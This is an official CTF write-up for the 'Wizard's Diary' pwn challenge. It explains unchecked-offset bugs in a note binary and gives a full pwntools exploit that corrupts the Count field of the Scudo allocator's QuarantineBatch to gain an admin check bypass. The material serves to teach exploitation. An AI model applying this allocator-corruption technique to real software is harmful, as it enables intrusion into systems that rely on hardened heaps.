
Wizard's diary

18th Nov 2022 / Document No. D22.102.263

Prepared By: ir0nstone

Challenge Author(s): fuzzerakos

Difficulty: Hard

Classification: Official

Synopsis
Wizard's Diary is a Hard pwn challenge that features the Scudo Allocator's quarantine
implementation and the corrupting of this structure to gain a Write-Where-Ptr primitive.

Skills Learned
Scudo Allocator

Analysis
We are given a Dockerfile which loads a binary wizards_diary and serves it. We see in
run.sh that some additional options are listed:

$ cat run.sh
export SCUDO_OPTIONS="thread_local_quarantine_size_kb=64:quarantine_size_kb=256:quarantine_max_chunk_size=2048"
export LD_PRELOAD="./libscudo.so"
./wizards_diary

A second shared library, libscudo.so, is loaded through LD_PRELOAD, and it is configured through
the SCUDO_OPTIONS environment variable. Some research tells us that the Scudo Allocator is a
hardened allocator that "provides additional mitigation against heap based vulnerabilities, while
maintaining good performance". Among other things, it has been the default allocator on Android
since Android 11. We'll analyse it in more depth later.

Protections
We'll start with a checksec :

As we can see:

Protection   Enabled   Usage
Canary       ✅        Prevents Buffer Overflows
NX           ✅        Disables code execution on stack
PIE          ✅        Randomizes the base address of the binary
RelRO        Full      Makes some binary sections read-only

The interface of the program looks like this:

Decompilation
main()
Classic setup for a heap note challenge:

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  int choice; // [rsp+8h] [rbp-8h]
  int not_suitable; // [rsp+Ch] [rbp-4h]

  not_suitable = 0;
  setup(argc, argv, envp);
  puts("=*=*= Welcome to University of Magic! =*=*=");
  puts("This app was created to aid the learning process of new magicians!");
  login();
  for ( choice = get_option(); ; choice = get_option() )
  {
    if ( !choice )
    {
      puts("Leaving University...");
      exit(0);
    }
    if ( choice == 1337 )
    {
      if ( *(_DWORD *)(logged_in_magician + 4) && *(_DWORD *)logged_in_magician )
      {
        system("cat flag.txt");
        exit(1337);
      }
      puts("You are not admin!");
    }
    else
    {
      if ( choice > 1337 )
        goto LABEL_20;
      if ( choice == 4 )
      {
        show_note();
        continue;
      }
      if ( choice > 4 )
        goto LABEL_20;
      if ( choice != 3 )
      {
        if ( choice == 1 )
        {
          new_note();
          continue;
        }
        if ( choice == 2 )
        {
          remove_note();
          continue;
        }
LABEL_20:
        puts("There is no such option!");
        continue;
      }
      if ( not_suitable )
      {
        puts("It seems you are not suitable to be in here...");
        exit(-2);
      }
      fix_note();
      not_suitable = 1;
    }
  }
}

The program flow is simple:

Call login()

Get a choice using get_option()

If 0 , quit

If 1 , call new_note()

If 2 , call remove_note()

If 3, call fix_note() and set the not_suitable flag, so a second use of this option exits the program

If 4 , call show_note()

If 1337 (secret option), perform a check and read flag.txt if it's passed

Obviously, the last one is of the most interest here, but let's go in order.

login()
After some cleaning up, it looks like this:

void __fastcall login()
{
  char *new_magician; // [rsp+8h] [rbp-38h]
  char name[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 canary; // [rsp+38h] [rbp-8h]

  canary = __readfsqword(0x28u);
  printf("Name: ");
  fgets(name, 32, stdin);
  if ( strcmp(name, "guest\n") )
  {
    if ( !strcmp(name, "admin\n") )
      puts("If you are indeed the admin, you won't have problem changing your account from guest to admin, right?");
    exit(0);
  }
  new_magician = (char *)malloc(8008uLL);
  *(_DWORD *)new_magician = 0;
  *((_DWORD *)new_magician + 1) = 0;
  printf("Enter a comment to your guest account: ");
  fgets(new_magician + 8, 8000, stdin);
  logged_in_magician = (__int64)new_magician;
}

The user is asked for a name. If it's not guest, the program quits. If it is, a chunk of size 8008 is
allocated and its first 8 bytes are zeroed out. A comment is then asked for, and the result is read
into the remaining 8000 bytes of the allocated chunk.

This looks like an allocation for a magician struct . We don't know what the first 8 bytes are, but
they seem to be treated as two DWORDs, so we'll set it to two integers for now:

struct Magician {
  int a;
  int b;
  char comment[8000];
};
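
As a quick sanity check on this guess, the layout can be mirrored in Python with ctypes. This is only a sketch: the field names a and b are the placeholders chosen above, not names recovered from the binary.

```python
import ctypes


class Magician(ctypes.Structure):
    # `a` and `b` are placeholder names for the two DWORDs zeroed in login().
    _fields_ = [
        ("a", ctypes.c_int),
        ("b", ctypes.c_int),
        ("comment", ctypes.c_char * 8000),
    ]


# Total size should match the malloc(8008) call in login().
print(ctypes.sizeof(Magician))
# Offset of comment should match the `new_magician + 8` passed to fgets().
print(Magician.comment.offset)
```

If the guess is right, the size agrees with the 8008 bytes requested in login() and comment starts 8 bytes into the chunk.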

The decompilation looks cleaner once the type is changed to Magician *:

void __fastcall login()
{
  Magician *new_magician; // [rsp+8h] [rbp-38h]
  char name[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 canary; // [rsp+38h] [rbp-8h]

  canary = __readfsqword(0x28u);
  printf("Name: ");
  fgets(name, 32, stdin);
  if ( strcmp(name, "guest\n") )
  {
    if ( !strcmp(name, "admin\n") )
      puts("If you are indeed the admin, you won't have problem changing your account from guest to admin, right?");
    exit(0);
  }
  new_magician = (Magician *)malloc(0x1F48uLL);
  new_magician->a = 0;
  new_magician->b = 0;
  printf("Enter a comment to your guest account: ");
  fgets(new_magician->comment, 0x1F40, stdin);
  logged_in_magician = new_magician;
}

get_option()

__int64 get_option()
{
  unsigned int opt; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  opt = 0;
  menu();
  __isoc99_scanf("%d", &opt);
  return opt;
}

No vulnerabilities here.
new_note()

void __fastcall new_note()
{
  int size; // [rsp+8h] [rbp-18h] BYREF
  unsigned int idx; // [rsp+Ch] [rbp-14h]
  int *chnk; // [rsp+10h] [rbp-10h]
  unsigned __int64 canary; // [rsp+18h] [rbp-8h]

  canary = __readfsqword(0x28u);
  idx = 0;
  while ( notes[idx] )
  {
    if ( (int)++idx > 15 )
    {
      puts("You can't add more notes!");
      return;
    }
  }
  chnk = (int *)malloc(0x10uLL);
  size = 0;
  printf("Size of note: ");
  __isoc99_scanf("%d", &size);
  *chnk = size;
  *((_QWORD *)chnk + 1) = malloc(*chnk);
  if ( !*((_QWORD *)chnk + 1) )
  {
    puts("Malloc error!");
    exit(-1);
  }
  printf("Note: ");
  read(0, *((void **)chnk + 1), *chnk);
  printf("Added note with idx %d \n", idx);
  notes[idx] = chnk;
}

It allocates a new 16-byte chunk. The first 8 bytes contain the size, and the second 8 bytes contain
a pointer to another chunk that holds the data. This looks like a Note struct:

struct Note {
  long size;
  char *data;
};

Only the low 4 bytes of the first field are ever used, and typing it as a long results in a lot of
SLODWORD macros in the decompilation. Instead I'll make it an int, followed by another int called
junk that stands in for the alignment padding:

struct Note {
  int size;
  int junk;
  char *data;
};
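
To illustrate why both typings describe the same 16 bytes, here is a small sketch using Python's struct module with native alignment. It assumes a 64-bit build, like the target binary; the format strings are just my encoding of the candidate layouts.

```python
import struct

# "@" selects native size and alignment: i = int, l = long, P = pointer.
layout_long = struct.calcsize("@lP")      # long size; char *data;
layout_int_junk = struct.calcsize("@iiP")  # int size; int junk; char *data;
layout_int_only = struct.calcsize("@iP")   # int size; <padding>; char *data;

print(layout_long, layout_int_junk, layout_int_only)
```

On a 64-bit system all three come out the same, because the pointer must be 8-byte aligned, so an explicit junk field simply names the padding the compiler would insert anyway.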
With these modifications, it looks like this:

void __fastcall new_note()
{
  int size; // [rsp+8h] [rbp-18h] BYREF
  unsigned int idx; // [rsp+Ch] [rbp-14h]
  Note *note; // [rsp+10h] [rbp-10h]
  unsigned __int64 canary; // [rsp+18h] [rbp-8h]

  canary = __readfsqword(0x28u);
  idx = 0;
  while ( notes[idx] )
  {
    if ( (int)++idx > 15 )
    {
      puts("You can't add more notes!");
      return;
    }
  }
  note = (Note *)malloc(0x10uLL);
  size = 0;
  printf("Size of note: ");
  __isoc99_scanf("%d", &size);
  note->size = size;
  note->data = (char *)malloc(note->size);
  if ( !note->data )
  {
    puts("Malloc error!");
    exit(-1);
  }
  printf("Note: ");
  read(0, note->data, note->size);
  printf("Added note with idx %d \n", idx);
  notes[idx] = note;
}

remove_note()

void __fastcall remove_note()
{
  unsigned int idx; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  idx = 0;
  printf("Index of note: ");
  __isoc99_scanf("%d", &idx);
  if ( idx <= 0xF && notes[idx] )
  {
    free((void *)notes[idx]);
    notes[idx] = 0LL;
    puts("Removed!");
  }
  else
  {
    puts("Wrong index");
  }
}

Simply removes a note, freeing the Note struct and nulling out the index. Note that the data field
of the Note struct is not freed, however.

fix_note()

void __fastcall fix_note()
{
  unsigned int idx; // [rsp+0h] [rbp-10h] BYREF
  int offset; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  idx = 0;
  offset = 0;
  printf("Index of note: ");
  __isoc99_scanf("%d", &idx);
  if ( idx <= 0xF && notes[idx] )
  {
    printf("Offset to fix: ");
    __isoc99_scanf("%d", &offset);
    getchar();
    printf("Correct byte: ");
    __isoc99_scanf("%c", &notes[idx]->data[offset]);
    puts("Fixed!");
  }
  else
  {
    puts("Wrong index");
  }
}

Here is the start of the bugs. A note index is asked for, and then an offset. data[offset] is then
modified based on user input, but offset is a signed int that is never checked against the note's
size, allowing for a single-byte relative write. Remember that once fix_note() is called, it can't
be called again.
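
The effect of the missing bounds check can be modelled in a few lines of Python. This is a toy model only: memory is a flat bytearray, and data_base and the 8-byte note size are hypothetical values picked for illustration.

```python
def fix_byte(memory: bytearray, data_base: int, offset: int, value: int) -> None:
    """Toy model of fix_note(): performs data[offset] = value with no size check."""
    # The real code never compares offset with note->size, and offset is signed.
    memory[data_base + offset] = value


memory = bytearray(64)  # hypothetical flat memory
data_base = 16          # hypothetical: an 8-byte note's data occupies bytes 16..23

fix_byte(memory, data_base, 40, 0x41)  # lands 32 bytes past the end of the note
fix_byte(memory, data_base, -8, 0x42)  # lands 8 bytes before the note
```

Both writes succeed even though neither offset lies inside the note, which is exactly the relative-write primitive the exploit relies on.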

show_note()

void __fastcall show_note()
{
  unsigned int idx; // [rsp+0h] [rbp-10h] BYREF
  int offset; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  idx = 0;
  offset = 0;
  printf("Index of note: ");
  __isoc99_scanf("%d", &idx);
  if ( idx <= 0xF && notes[idx] )
  {
    printf("Offset to show: ");
    __isoc99_scanf("%d", &offset);
    getchar(); // consume newline
    printf("Byte: ");
    printf("%c\n", (unsigned int)notes[idx]->data[offset]);
  }
  else
  {
    puts("Wrong index");
  }
}

This is the exact same vulnerability, but for reading, and unlike fix_note() it can be used as many
times as we like.

Summary
If we go back to main() , we can again see the criteria for entering 1337 using our newly-modified
structs:

if ( choice == 1337 )
{
  if ( logged_in_magician->b && logged_in_magician->a )
  {
    system("cat flag.txt");
    exit(1337);
  }
  puts("You are not admin!");
}

We need both logged_in_magician->a and logged_in_magician->b to be non-zero. Both of these are
initially set to zero, with no in-built way to modify them. In addition to this:

We have one single-byte relative write

We have as many single-byte relative reads as we want

An initial thought could be to overwrite a and b with the relative write, but we only have one!
We need a different approach.

The Scudo Allocator


Let's look a bit more closely at the flags:

thread_local_quarantine_size_kb=64
quarantine_size_kb=256
quarantine_max_chunk_size=2048

This page explains what these options do.


Option                            Description
thread_local_quarantine_size_kb   Size (in kilobytes) of per-thread cache used to offload the global quarantine.
quarantine_size_kb                Size (in kilobytes) of quarantine used to delay the actual deallocation of chunks.
quarantine_max_chunk_size         Size (in bytes) up to which chunks will be quarantined (if lower than or equal to).

It seems like we're using Scudo's quarantine functionality. The last option,
quarantine_max_chunk_size, ensures it's used for struct Note allocations (16 bytes), but not for
struct Magician allocations (which are 8008 bytes). Whether or not it's used for the data part of
Note structs depends on which size value we input.
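
As a rough sketch of that reasoning, the option string from run.sh can be parsed and the size rule applied to the challenge's allocations. The helper names are hypothetical, only the colon-separated form seen in run.sh is handled, and the "lower than or equal to" comparison is taken from the option description rather than from Scudo's source.

```python
def parse_scudo_options(options: str) -> dict:
    """Split a colon-separated key=value string into a dict of ints."""
    pairs = (item.split("=", 1) for item in options.split(":"))
    return {key: int(value) for key, value in pairs}


OPTIONS = (
    "thread_local_quarantine_size_kb=64"
    ":quarantine_size_kb=256"
    ":quarantine_max_chunk_size=2048"
)
opts = parse_scudo_options(OPTIONS)


def is_quarantined(size: int) -> bool:
    """Simplified rule: chunks up to quarantine_max_chunk_size are quarantined."""
    return size <= opts["quarantine_max_chunk_size"]


for name, size in [("Note", 16), ("Magician", 8008), ("note data (100)", 100)]:
    print(name, is_quarantined(size))
```

Under this simplified rule, the Note structs and the 100-byte note data used later would qualify on free, while the Magician chunk would not.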

Scudo Quarantines are superseded by ARM MTE, which comes in the latest Android versions. The
official Scudo documentation has the following to say about quarantining:

The Quarantine: offers a way to delay the deallocation operations, preventing blocks to be
immediately available for reuse. Blocks held will be recycled once certain size criteria are
reached. This is essentially a delayed freelist which can help mitigate some use-after-free
situations. This feature is fairly costly in terms of performance and memory footprint, is
mostly controlled by runtime options and is disabled by default.

Quarantined chunks are stored in a QuarantineBatch structure:

struct QuarantineBatch {
  // With the following count, a batch (and the header that protects it) occupy
  // 4096 bytes on 32-bit platforms, and 8192 bytes on 64-bit.
  static const u32 MaxCount = 1019;
  QuarantineBatch *Next;
  uptr Size;
  u32 Count;
  void *Batch[MaxCount];
};

QuarantineBatch structs form a linked list stored in a QuarantineCache struct. This excellent
un1fuzz article describes the structure of the quarantine-related classes; each QuarantineBatch
stores:

A pointer to the next QuarantineBatch in the linked list

A Size variable, which is the total size of the quarantined nodes recorded in this batch PLUS the
size of the QuarantineBatch itself

Count , which keeps track of how many nodes are in the Batch array

Batch , the array holding the pointers to quarantined chunks
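
The field offsets matter later on, so here is a sketch of the 64-bit layout using ctypes. It assumes an x86-64 target, models pointers and uptr as 8-byte integers, and omits the static MaxCount constant since it takes no space in the object.

```python
import ctypes

MAX_COUNT = 1019


class QuarantineBatch(ctypes.Structure):
    # Assumption: 64-bit target, so pointers and uptr are 8 bytes each.
    _fields_ = [
        ("Next", ctypes.c_uint64),
        ("Size", ctypes.c_uint64),
        ("Count", ctypes.c_uint32),
        ("Batch", ctypes.c_uint64 * MAX_COUNT),
    ]


print(QuarantineBatch.Count.offset)   # Count follows Next and Size
print(QuarantineBatch.Batch.offset)   # Batch[0] sits 8 bytes after Count
print(ctypes.sizeof(QuarantineBatch))
```

Under these assumptions Batch[0] sits 8 bytes after Count, and the struct is 16 bytes short of the 8192 bytes mentioned in the source comment, which leaves room for the header that protects it.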

This QuarantineBatch structure is stored on the heap, along with all of our chunks as well. When
a user frees a chunk, the push_back() function will be called. push_back() is responsible for
adding a pointer to this chunk in the structure:

void push_back(void *Ptr, uptr Size) {
  Batch[Count++] = Ptr;
  this->Size += Size;
}
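
To see why an unchecked Count is dangerous, here is a toy Python model of push_back() operating on flat memory. The offsets assume the 64-bit layout (Size at 8, Count at 16, Batch at 24), and the buffer size, pointer value and corrupted Count are made-up illustration values.

```python
import struct

SIZE_OFFSET, COUNT_OFFSET, BATCH_OFFSET = 8, 16, 24  # assumed 64-bit layout


def push_back(memory: bytearray, base: int, ptr: int, size: int) -> None:
    """Toy model of QuarantineBatch::push_back without any Count check."""
    count = struct.unpack_from("<I", memory, base + COUNT_OFFSET)[0]
    # Batch[Count++] = Ptr: the slot address depends entirely on Count.
    struct.pack_into("<Q", memory, base + BATCH_OFFSET + 8 * count, ptr)
    struct.pack_into("<I", memory, base + COUNT_OFFSET, count + 1)
    # this->Size += Size
    total = struct.unpack_from("<Q", memory, base + SIZE_OFFSET)[0]
    struct.pack_into("<Q", memory, base + SIZE_OFFSET, total + size)


memory = bytearray(0x200)                    # hypothetical memory, batch at offset 0
struct.pack_into("<I", memory, 16, 0x20)     # pretend an attacker set Count to 0x20
push_back(memory, 0, 0x7EFC85E0EC10, 0x10)   # next free writes at 24 + 8 * 0x20
```

Whoever controls Count controls where the next freed pointer is written, relative to the start of the Batch array.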

The latest version of the quarantine has a check to ensure that Count < MaxCount , but that was
not there at the time of the challenge release (thankfully!):

DCHECK_LT(Count, MaxCount);

Finally, Scudo also randomises allocation locations, as if the other defences weren't enough.

Exploitation
Plan
We want to overwrite the two integers (together one QWORD) at the start of logged_in_magician
with something that isn't zero. To do this, we will spend our single one-byte overwrite on the Count
field of the QuarantineBatch structure, so that Batch[Count] refers to the address of
logged_in_magician->a. The next free will then make push_back() write a heap address to this
location, which makes both a and b non-zero, passing the check and allowing us to receive the flag.

We will set up debugging in Docker in the classic way.

Setup
Normal setup of helper functions:

from pwn import *

p = remote('127.0.0.1', 1337)

def new_note(size, value):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b':', str(size).encode())
    p.sendlineafter(b':', value)

def remove_note(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b':', str(idx).encode())

def fix_note(idx, off, byte):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b':', str(idx).encode())
    p.sendlineafter(b':', str(off).encode())
    p.sendlineafter(b':', byte)

def show_note(idx, off):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b':', str(idx).encode())
    p.sendlineafter(b':', str(off).encode())

    p.recvuntil(b'Byte: ')
    b = p.recvline().rstrip()
    return b

Finding Offset from Batch to logged_in_magician


So the ultimate aim here is to find out what we have to overwrite Count with in order to overwrite
the first 8 bytes of logged_in_magician . Let's start by setting our comment to something
noticeable, adding a large note for offsetting and also allocating + freeing a collection of chunks.
We do this so that the Count of the QuarantineBatch becomes non-zero, making it easier to
identify.

Note that comment is located 8 bytes after a and b .

# basic setup
p.sendlineafter(b'Name: ', b'guest')
# comment, located 8 bytes after the desirable location
p.sendline(b'i'*8)

# get note for offsetting
new_note(8176, b'note_0')

# free into Scudo to get a QuarantineBatch
# set Count to 4
for i in range(0, 4):
    new_note(100, b'ABCD')
for i in range(0, 4):
    remove_note(i+1)

log.info('Set Count to 4')

Let's debug this. Scudo doesn't use the glibc heap, so vis_heap_chunks won't show its chunks, but
we can search writeable regions in GDB:

pwndbg> search -w -t bytes iiiiiiii
Searching for value: 'iiiiiiii'
[anon_7f1785e09] 0x7f1785e0f018 'iiiiiiii\n'

If we print out large chunks of this region, everything appears to be null, so let's look at the 4
value for Count and see where that is. We'll assume it's in the same region:

pwndbg> search -1 0x4 anon_7f1785e09
Searching for value: b'\x04'
[anon_7f1785e09] 0x7f1785e0b020 0x4

We can see the structure here is reminiscent of a QuarantineBatch structure:

pwndbg> x/20gx 0x7f1785e0b000
0x7f1785e0b000: 0x6262000001ff011c 0x0000000000000000
0x7f1785e0b010: 0x0000000000000000 0x0000000000002030
0x7f1785e0b020: 0x0000000000000004 0x00007efc85e0ec10 <- Count, Batch[0]
0x7f1785e0b030: 0x00007efc85e0e770 0x00007efc85e0eaf0 <- Batch[1], Batch[2]
0x7f1785e0b040: 0x00007efc85e0e0b0 0x0000000000000000 <- Batch[3]
0x7f1785e0b050: 0x0000000000000000 0x0000000000000000
0x7f1785e0b060: 0x0000000000000000 0x0000000000000000
0x7f1785e0b070: 0x0000000000000000 0x0000000000000000
0x7f1785e0b080: 0x0000000000000000 0x0000000000000000
0x7f1785e0b090: 0x0000000000000000 0x0000000000000000

So:

Count is located at 0x7f1785e0b020

Batch[0] at 0x7f1785e0b028

logged_in_magician->a is located at 0x7f1785e0f010 (8 before the comment )

Now we just need to work out the offset from Batch[0] to logged_in_magician->a , which is
0x3fe8 . That's 0x7fd QWORDs, so the index we want to write Count to is 0x7fd .
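
The arithmetic can be reproduced in Python from the addresses found in this particular debugging session (they will differ on every run):

```python
# Addresses taken from the GDB session above; they change between runs.
count_addr = 0x7F1785E0B020
batch0_addr = count_addr + 8       # Batch[0] directly follows Count (plus padding)
comment_addr = 0x7F1785E0F018
a_addr = comment_addr - 8          # a and b sit in the 8 bytes before comment

byte_offset = a_addr - batch0_addr
index, remainder = divmod(byte_offset, 8)  # Batch[] holds 8-byte pointers

print(hex(byte_offset), hex(index), remainder)  # 0x3fe8 0x7fd 0
```

A remainder of zero confirms that logged_in_magician->a lines up exactly with a Batch slot, so a single pointer write covers both a and b.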

Remember, we can only write one byte. What we're going to do is write the higher byte, the 0x7,
to the second-least-significant byte of Count, turning 0x4 into 0x704. We can then allocate and
free up to 0xff chunks afterwards to gradually increment Count from 0x704 to 0x7fd; the free that
runs while Count is 0x7fd writes its pointer over a and b.
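
A small helper makes the constraint explicit. This is a sketch with a hypothetical function name; it assumes Count currently fits in one byte and that only the second-least-significant byte may be overwritten.

```python
def plan_count_overwrite(target_index: int, current_count: int):
    """Return (byte_to_write, frees_needed), or None if one byte cannot get there."""
    if current_count > 0xFF or target_index > 0xFFFF:
        return None
    high = target_index >> 8
    patched = (high << 8) | current_count  # Count after the one-byte write
    if patched > target_index:
        return None  # Count only ever increases, so the target is already behind us
    # Count must equal target_index when the last free runs, hence the +1.
    return bytes([high]), target_index - patched + 1


print(plan_count_overwrite(0x7FD, 4))  # (b'\x07', 250)
print(plan_count_overwrite(0x702, 4))  # None
```

The second call shows one way an attempt can fail: if the low byte we need is smaller than the current Count, no number of extra frees will reach it without carrying into the high byte.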

One more thing to note: this offset is not constant. Scudo allocates chunks at random positions
and reuses chunks at random times to combat heap exploits. We'll have to calculate this distance
dynamically, and to do this we'll abuse the byte read functionality. We'll start at offset 0 of note 0
and keep iterating until we have found both an i character (the start of comment, 8 bytes after
logged_in_magician->a) and a \x04 byte (the Count).

batch_0 = 0
comment = 0
i = 0

while batch_0 == 0 or comment == 0:
    # too far, no luck
    if i > 0x10000:
        p.close()
        log.error('Failed! i was exhausted')

    # i is 8-byte aligned, as everything else is
    i += 8
    c = show_note(0, i)

    # found `Count`!
    if c == b'\x04':
        log.success(f'Found Count at i = {i}!')
        # Batch[0] is 8 after Count
        batch_0 = i + 8
    # found our `comment`!
    elif c == b'i':
        log.success(f'Found comment at i = {i}!')
        # a is 8 before comment
        comment = i - 8

Occasionally the comment will be lower in memory than Count , in which case this is not possible,
so we exit early:

# if comment is lower in memory than the Count, we can't overwrite it anyway
if batch_0 > comment:
    log.error('Failed: Batch lower in memory than comment')

Calculating the new Count value


Now we want to calculate the new Count value. We'll replicate our manual approach in code - first
we calculated the difference in offsets:

log.info('Calculating offset and writing LSB...')

offset = comment - batch_0

Then we worked out how many indices that would have to be:

idx_count = offset // 8

Then, finally, we dropped the lowest byte, keeping only the byte above it:

second_lsb = idx_count >> 8

This is the value we want to write to the second LSB of Count . We'll do that now with our one
write:

# batch_0 - 8 is Count, +1 for second LSB
# bytes([x]) sends one raw byte; chr(x).encode() would emit two bytes for x >= 0x80
fix_note(0, batch_0 - 8 + 1, bytes([second_lsb]))

Trigger Frees and Get Flag


Finally we want to create a bunch of allocations and frees to increment Count to the point that
the LSB is also the correct value to overwrite a and b in logged_in_magician :

log.info('Lots of frees')

# brute force 0xff allocations
# this loops the LSB of `Count` through all possible values
# hoping for one to be equal to what we need
for i in range(0xff):
    new_note(100, b'A')
    remove_note(1)

Note that we only have one loop that allocates and frees immediately here. This is not as reliable
as 0xff allocations followed by 0xff frees, as Scudo can reuse chunks, but the notes array only
has 16 slots, so we'll have to deal with it.

Finally, send 1337 and get the flag!

# get flag
log.info('Printing Flag...')
p.sendlineafter(b'> ', b'1337')
flag = p.recvline().decode()
log.success(f'Flag: {flag}')

The exploit works, but not with a 100% success rate, due to the aforementioned randomisation
problems:

We get the fake flag! Now we just have to transfer it remotely and grab the actual flag. It takes a
while (and a few tries), but eventually the flag comes back.

Improving Efficiency
The exploit takes a while, so there's something we can do to speed it up. Count is always 16-byte
aligned, so we can increase i by 16 each time rather than 8. comment, on the other hand,
always ends in an 8 in hex: it's always 8 more than a 16-byte alignment. That's not a problem,
since we can increment by 16 each time and, once we find Count, increment by 8 once to shift
the alignment. We can also initialise i as 8176, as that's the size we chose for the first Note's
data, so any offset of interest must be greater than that. The former drops the time taken by an
average of 50%, and the latter drops it yet further (by 8176 // 16 = 511 requests, in fact).

    i += 16
    c = show_note(0, i)

    # found `Count`!
    if c == b'\x04':
        log.success(f'Found Count at i = {i}!')
        # Batch[0] is 8 after Count
        batch_0 = i + 8
        i += 8
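
The faster scan can be tried offline against a fake memory image before pointing it at the remote. The sketch below is a self-contained variant rather than the exact exploit loop: locate() and read_byte are hypothetical names, the marker positions are invented, and it only looks for comment once Count has been found, since the other ordering is unusable anyway.

```python
def locate(read_byte, start=8176, limit=0x10000):
    """Return (batch_0, a_offset) using a 16-byte stride, or None if not found."""
    i, batch_0 = start, None
    while i <= limit:
        i += 16
        c = read_byte(i)
        if batch_0 is None:
            if c == b"\x04":
                batch_0 = i + 8  # Batch[0] is 8 after Count
                i += 8           # shift onto the ...8 alignment used by comment
        elif c == b"i":
            return batch_0, i - 8  # a is 8 before comment
    return None


# Fake memory: Count (value 4) at 0x2020, comment ("iiiiiiii") at 0x6018.
memory = bytearray(0x7000)
memory[0x2020] = 4
memory[0x6018:0x6020] = b"i" * 8

result = locate(lambda off: bytes(memory[off:off + 1]))
print(result)
```

Against the real service, read_byte would be a thin wrapper around show_note(0, off), at the cost of one round trip per probed offset.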
